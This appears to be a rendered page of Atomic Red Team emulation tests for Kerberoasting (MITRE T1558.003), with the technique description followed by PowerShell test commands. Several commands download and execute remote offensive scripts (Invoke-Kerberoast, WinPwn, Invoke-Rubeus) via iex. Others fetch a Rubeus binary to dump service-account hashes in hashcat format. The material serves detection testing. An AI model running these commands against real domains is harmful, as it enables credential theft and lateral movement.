Adversaries may abuse a valid Kerberos ticket-granting ticket (TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket that may be vulnerable to [Brute Force](https://attack.mitre.org/techniques/T1110).(Citation: Empire InvokeKerberoast Oct 2016)(Citation: AdSecurity Cracking Kerberos Dec 2015) Service principal names (SPNs) are used to uniquely identify each instance of a Windows service. To enable authentication, Kerberos requires that SPNs be associated with at least one service logon account (an account specifically tasked with running a service(Citation: Microsoft Detecting Kerberoasting Feb 2018)).(Citation: Microsoft SPN)(Citation: Microsoft SetSPN)(Citation: SANS Attacking Kerberos Nov 2014)(Citation: Harmj0y Kerberoast Nov 2016) Adversaries possessing a valid Kerberos ticket-granting ticket (TGT) may request one or more Kerberos ticket-granting service (TGS) service tickets for any SPN from a domain controller (DC).(Citation: Empire InvokeKerberoast Oct 2016)(Citation: AdSecurity Cracking Kerberos Dec 2015) Portions of these tickets may be encrypted with the RC4 algorithm, meaning the Kerberos 5 TGS-REP etype 23 hash of the service account associated with the SPN is used as the private key and is thus vulnerable to offline [Brute Force](https://attack.mitre.org/techniques/T1110) attacks that may expose plaintext credentials.(Citation: AdSecurity Cracking Kerberos Dec 2015)(Citation: Empire InvokeKerberoast Oct 2016) (Citation: Harmj0y Kerberoast Nov 2016) This same behavior could be executed using service tickets captured from network traffic.(Citation: AdSecurity Cracking Kerberos Dec 2015) Cracked hashes may enable [Persistence](https://attack.mitre.org/tactics/TA0003), [Privilege Escalation](https://attack.mitre.org/tactics/TA0004), and [Lateral Movement](https://attack.mitre.org/tactics/TA0008) via access to [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: SANS Attacking Kerberos Nov 2014)
Atomic Test #3 - Extract all accounts in use as SPN using setspn
Atomic Test #7 - WinPwn - PowerSharpPack - Kerberoasting Using Rubeus
This test uses the Powershell Empire Module: Invoke-Kerberoast.ps1 The following are further sources and credits for this attack: [Kerberoasting Without Mimikatz source] (https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/) [Invoke-Kerberoast source] (https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/) when executed successfully , the test displays available services with their hashes. If the testing domain doesn’t have any service principal name configured, there is no output
Supported Platforms: Windows
auto_generated_guid: 3f987809-3681-43c8-bcd8-b3ff3a28533a
1
powershell
1
2
3
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/EmpireProject/Empire/08cbd274bef78243d7a8ed6443b8364acd1fc48b/data/module_source/credentials/Invoke-Kerberoast.ps1 -UseBasicParsing)
Invoke-Kerberoast | fl
1
powershell
1
if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}
1
Write-Host Joining this computer to a domain must be done manually
Information on the Rubeus tool and it’s creators found here: https://github.com/GhostPack/Rubeus#asreproast This build targets .NET 4.5. If targeting a different version you will need to compile Rubeus
Supported Platforms: Windows
auto_generated_guid: 14625569-6def-4497-99ac-8e7817105b55
| Name | Description | Type | Default Value | |——|————-|——|—————| | local_folder | Local path of Rubeus executable | path | PathToAtomicsFolder\..\ExternalPayloads| | local_executable | name of the rubeus executable | string | rubeus.exe| | out_file | file where command results are stored | string | rubeus_output.txt| | rubeus_url | URL of Rubeus executable | url | https://github.com/morgansec/Rubeus/raw/de21c6607e9a07182a2d2eea20bb67a22d3fbf95/Rubeus/bin/Debug/Rubeus45.exe| | flags | command flags you would like to run (optional and blank by default) | string | |
1
powershell
1
2
klist purge
cmd.exe /c "#{local_folder}\#{local_executable}" kerberoast #{flags} /outfile:"#{local_folder}\#{out_file}"
1
Remove-Item "#{local_folder}\#{out_file}" -ErrorAction Ignore
1
powershell
1
if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}
1
Write-Host Joining this computer to a domain must be done manually
1
if(Test-Path -Path "#{local_folder}\#{local_executable}") {exit 0} else {exit 1}
1
2
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-Webrequest -Uri #{rubeus_url} -OutFile "#{local_folder}\#{local_executable}"
The following test will utilize setspn to extract the Service Principal Names. This behavior is typically used during a kerberos or silver ticket attack. A successful execution will output all the SPNs for the related domain.
Supported Platforms: Windows
auto_generated_guid: e6f4affd-d826-4871-9a62-6c9004b8fe06
| Name | Description | Type | Default Value | |——|————-|——|—————| | domain_name | The Domain Name to lookup against | string | %USERDNSDOMAIN%|
1
command_prompt
setspn -T #{domain_name} -Q */*
1
powershell
1
if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}
1
Write-Host Joining this computer to a domain must be done manually
The following test will utilize native PowerShell Identity modules to query the domain to extract the Service Principal Names for a single computer. This behavior is typically used during a kerberos or silver ticket attack. A successful execution will output the SPNs for the endpoint in question.
Supported Platforms: Windows
auto_generated_guid: 988539bc-2ed7-4e62-aec6-7c5cf6680863
1
powershell
1
2
3
Add-Type -AssemblyName System.IdentityModel
$ComputerFQDN=$env:LogonServer.trimStart('\') + "." + $env:UserDnsDomain
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "HTTP/$ComputerFQDN"
1
powershell
1
if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}
1
Write-Host Joining this computer to a domain must be done manually
The following test will utilize native PowerShell Identity modules to query the domain to extract allthe Service Principal Names. This behavior is typically used during a kerberos or silver ticket attack. A successful execution will output the SPNs for the domain in question.
Supported Platforms: Windows
auto_generated_guid: 902f4ed2-1aba-4133-90f2-cff6d299d6da
| Name | Description | Type | Default Value | |——|————-|——|—————| | domain_name | The Domain Name to lookup against | string | %USERDNSDOMAIN%|
1
powershell
1
2
Add-Type -AssemblyName System.IdentityModel
setspn.exe -T #{domain_name} -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }
1
powershell
1
if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}
1
Write-Host Joining this computer to a domain must be done manually
Kerberoasting technique via function of WinPwn
Supported Platforms: Windows
auto_generated_guid: 78d10e20-c874-45f2-a9df-6fea0120ec27
1
powershell
1
2
3
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Kerberoasting -consoleoutput -noninteractive
PowerSharpPack - Kerberoasting Using Rubeus technique via function of WinPwn
Supported Platforms: Windows
auto_generated_guid: 29094950-2c96-4cbd-b5e4-f7c65079678f
1
powershell
1
2
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Rubeus.ps1')
Invoke-Rubeus -Command "kerberoast /format:hashcat /nowrap"